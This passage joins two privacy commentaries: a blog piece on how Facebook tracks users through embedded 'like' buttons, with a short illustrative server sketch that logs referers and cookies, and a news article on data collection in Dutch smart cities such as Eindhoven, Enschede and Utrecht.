And it’s not just the data you choose to share. The information you post is not the whole story.  It’s only the tip of the iceberg of data that Facebook has collected about you.

Every time you go online you leave a trail of digital breadcrumbs.  Facebook has been busily sweeping up those breadcrumbs, and using them to categorise and profile you.  Facebook obviously knows when you click on a Facebook ‘like’ button; but also, unless a web developer has gone out of their way to find tools to block them (as we have done for our Salinger Privacy blog), Facebook knows every time you simply look at a website that has a Facebook ‘like’ button somewhere on it.
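
The mechanics are mundane: the browser’s request for the embedded button automatically carries both the page being read (the Referer header) and the visitor’s cookie. A minimal sketch of what the third-party side can log, with an invented host:

```typescript
// Sketch of why an embedded "like" button is enough to log a visit: the
// browser's request for the button carries both the page it sits on (the
// Referer header) and the visitor's cookie. Minimal Node server; the host
// and paths are invented for illustration.

import { createServer } from "node:http";

const server = createServer((req, res) => {
  if (req.url?.startsWith("/like-button")) {
    const pageVisited = req.headers.referer ?? "unknown page";
    const userCookie = req.headers.cookie ?? "no cookie (yet)";
    // One log entry per page view, tied to a persistent identifier.
    console.log(`cookie=[${userCookie}] viewed ${pageVisited}`);
    res.writeHead(200, { "Content-Type": "image/svg+xml" });
    res.end('<svg xmlns="http://www.w3.org/2000/svg"/>'); // the button artwork
  } else {
    res.writeHead(404);
    res.end();
  }
});

server.listen(8080); // every page embedding the button reports visits here
```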

So if you only post or ‘like’ stories about inspirational mountain climbers and funny cat videos, but also do things online that you don’t share with your family, friends or work colleagues (like looking at stories about abortion or dealing with infidelity, Googling how to manage anxiety or erectile dysfunction, whingeing about your employer in a chatroom, or spending hours reviewing dating profiles, gambling or shopping obsessively for shoes)  — Facebook has you pegged anyway.

Plus, Facebook obtains data from other sources which know about your offline purchases, to build an even richer picture of who you really are.  And of course, Facebook may have access to your address book, your location history, the contents of your private messages, and depending on your brand of phone, possibly even a history of your phone calls and text messages.

All that information is used to draw inferences and assumptions about your preferences, and predict your likely behaviour.  The results are then used to categorise, profile and ultimately target you, in a process usually described as ‘online behavioural advertising’.

It’s not ‘just ads’

The objective of online behavioural advertising is to predict your purchasing interests and drive a purchase decision.  So far, the same as any other advertising.  But online, the implications for us as individuals are much greater.

Facebook’s promise to advertisers is that it can show their ad to exactly who the advertiser wants, and exclude everybody else.

However, by allowing exclusion, the platform also allows discrimination.  Facebook has been caught allowing advertisers to target — and exclude — people on the basis of their ‘ethnic affinity’, amongst other social, demographic, racial and religious characteristics.  So a landlord with an ad for rental housing could prevent people profiled as ‘single mothers’ from ever seeing their ad.  An employer could prevent people identifying as Jewish from seeing a job ad.  A bank could prevent people categorised as African Americans from seeing an ad for a home loan.

Existing patterns of social exclusion, economic inequality and discrimination are further entrenched by micro-targeted advertising, which is hidden from public view and regulatory scrutiny.


Predictive analytics can narrow or alter your life choices

Once we move beyond straight-up advertising and into predictive analytics, the impact on individual autonomy becomes more acute.  Big Data feeds machine learning, which finds patterns in the data, from which new rules (algorithms) are designed.  Algorithms predict how a person will behave, and suggest how they should be treated.

Algorithms can lead to price discrimination, like surge pricing based on Uber knowing how much phone battery life you have left.  Or market exclusion, like Woolworths only offering car insurance to customers it has decided are low risk, based on an assessment of the groceries they buy.

Banks have been predicting the risk of a borrower defaulting on a loan for decades, but now algorithms are also used to determine who to hire, predict when a customer is pregnant, and deliver targeted search results to influence how you vote.

Algorithms are also being used to predict the students at risk of failure, the prisoners at risk of re-offending, and the people at risk of suicide, and then to launch interventions accordingly.  However, even leaving aside the accuracy of those predictions, interventions are not necessarily well-intentioned.  It was revealed last year that Australian Facebook executives were touting to advertisers their ability to target psychologically vulnerable teenagers.

Automated decision-making diminishes our autonomy, by narrowing or altering our market and life choices, in ways that are not clear to us.  People already in a position of economic or social disadvantage face the additional challenge of trying to disprove or beat an invisible algorithm.

In a predictive and pre-emptive world, empathy, forgiveness, rehabilitation, redemption, individual dignity, autonomy and free will are programmed out of our society.

Fiddling with users’ privacy settings on Facebook won’t fix anything.  If we want our lives to be ruled by human values and individual dignity, instead of by machines fed on questionable data, we need robust, enforced and globally effective privacy laws.

A new European privacy law commences later this month.  The obligations include that businesses and governments must offer understandable explanations of how their algorithms work, and allow people to seek human review of automated decision-making.  This is a step in the right direction, which Australia, the US and the rest of the world should follow.


‘Living laboratories’: the Dutch cities amassing data on oblivious residents

Stratumseind in Eindhoven is one of the busiest nightlife streets in the Netherlands. On a Saturday night, bars are packed, music blares through the street, laughter and drunken shouting bounces off the walls. As the night progresses, the ground becomes littered with empty shot bottles, energy drink cans, cigarette butts and broken glass.

It’s no surprise that the place is also known for its frequent fights. To change that image, Stratumseind has become one of the “smartest” streets in the Netherlands. Lamp-posts have been fitted with wifi-trackers, cameras and 64 microphones that can detect aggressive behaviour and alert police officers to altercations. There has been a failed experiment to change light intensity to alter the mood. The next plan, starting this spring, is to diffuse the smell of oranges to calm people down. The aim? To make Stratumseind a safer place.


All the while, data is being collected and stored. “Visitors do not realise they are entering a living laboratory,” says Maša Galic, a researcher on privacy in the public space for the Tilburg Institute of Law, Technology and Society. Since the data on Stratumseind is used to profile, nudge or actively target people, this “smart city” experiment is subject to privacy law. According to the Dutch Personal Data Protection Act, people should be notified in advance of data collection and the purpose should be specified – but in Stratumseind, as in many other “smart cities”, this is not the case.

Peter van de Crommert is involved at Stratumseind as project manager with the Dutch Institute for Technology, Safety and Security. He says visitors do not have to worry about their privacy: the data is about crowds, not individuals. “We often get that comment – ‘Big brother is watching you’ – but I prefer to say, ‘Big brother is helping you’. We want safe nightlife, but not a soldier on every street corner.”

When we think of smart cities, we usually think of big projects: Songdo in South Korea, the IBM control centre in Rio de Janeiro or the hundreds of new smart cities in India. More recent developments include Toronto, where Google will build an entirely new smart neighbourhood, and Arizona, where Bill Gates plans to build his own smart city. But the reality of the smart city is that it has stretched into the everyday fabric of urban life – particularly so in the Netherlands.

In the eastern city of Enschede, city traffic sensors pick up your phone’s wifi signal even if you are not connected to the wifi network. The trackers register your MAC address, the unique network card number in a smartphone. The city council wants to know how often people visit Enschede, and what their routes and preferred spots are. Dave Borghuis, an Enschede resident, was not impressed and filed an official complaint. “I don’t think it’s okay for the municipality to track its citizens in this way,” he said. “If you walk around the city, you have to be able to imagine yourself unwatched.”

Enschede is enthusiastic about the advantages of the smart city. The municipality says it is saving €36m in infrastructure investments by launching a smart traffic app that rewards people for good behaviour like cycling, walking and using public transport. (Ironically, one of the rewards is a free day of private parking.) Only those who mine the small print will discover that the app creates “personal mobility profiles”, and that the collected personal data belongs to the company Mobidot.

‘Targeted supervision’ in Utrecht

Companies are getting away with this in part because it involves new applications of data. In Silicon Valley they call it “permissionless innovation”: the belief that technological progress should not be stifled by public regulations. For the same reason, they can be secretive about what data is collected in a public space and what it is used for. Often the cities themselves don’t know.


Utrecht has become a tangle of individual pilots and projects, with no central overview of how many cameras and sensors exist, nor what they do. In 2014, the city invested €80m in data-driven management that launched in 80 projects. Utrecht now has a burglary predictor, a social media monitoring room, and smart bins and smart streetlights with sensors (although the city couldn’t say where these are located). It has scanner cars that dispense parking tickets and, as an added bonus disclosed in the cars’ own privacy regulation, detect residents with a municipal tax debt. But when I asked the city to respond to a series of questions on just 22 of the smart projects, it could only answer for five of them, referring me to private companies for the rest of the answers.

The city also keeps track of the number of young people hanging out in the streets, their age group, whether they know each other, the atmosphere and whether or not they cause a nuisance. Special enforcement officers keep track of this information through mobile devices. It calls this process “targeted and innovative supervision”. Other council documents mention the prediction of school drop-outs, the prediction of poverty and the monitoring of “the health of certain groups” with the aim of “intervening faster”.

Like many cities, Utrecht argues that it acts in accordance with privacy laws because it anonymises or pseudonymises data (assigning it a number instead of a name or address). But pseudonymised personal data is still personal data. “The process is not irreversible if the source file is stored,” says Mireille Hildebrandt, professor of ICT and Law at Radboud University. “Moreover, if you build personal profiles and act on them, it is still a violation of privacy and such profiling can – unintentionally – lead to discrimination.” She points to Utrecht’s plan to register the race and health data of prostitutes, which came in for heavy criticism from the Dutch Data Protection Authority.

Another unanswered question regards who owns data that is collected in a public space. Arjen Hof is director of Civity, a company that builds data platforms for governments. “Public authorities are increasingly outsourcing tasks to private companies. Think of waste removal or street lighting,” he says. “But they do not realise that at the same time a lot of data is collected, and do not always make agreements about the ownership of data.”

‘A smart city is a privatised city’

Hof gives the example of CityTec, a company that manages 2,000 car parks, 30,000 traffic lights and 500,000 lamp-posts across the Netherlands. It refused to share with municipalities the data it was collecting through its lamp-post sensors. “Their argument was that, although the municipality is legally owner of the lamp-posts, CityTec is the economic owner and, for competitive reasons, did not want to make the data available,” Hof says. This was three years ago, but for a lot of companies it remains standard practice. Companies dictate the terms, and cities say they can’t share the contracts because they contain “competition-sensitive information”.

When I interviewed the technology writer Evgeny Morozov in October, he warned of cities becoming too dependent on private companies. “The culmination of the smart city is a privatised city,” he said. “A city in which you have to pay for previously free services.”

Morozov’s fear about public subsidies being used for private innovation is well illustrated in Assen, a city of 70,000 people in the north of the country. Assen built a fibre-optic network for super-fast internet in 2011, to which it connected 200 sensors that measure, among other things, the flow of cars. There was an experiment to steer people around traffic jams, even though traffic in the city is relatively light. The city also connected its traffic lights, parking garages and parking signs to this grid. The cost of €46m was split between Brussels, the national government, the province and the municipality. Companies such as the car navigation firm TomTom have used the sensor network to test new services.

The project, called Sensor City, filed for bankruptcy a year ago. Now the publicly funded fibre-optic network, sensors and all, will be sold to a still-unidentified private company. The municipality will have to strike a deal with the new owner about the use of its public traffic lights and parking signs.
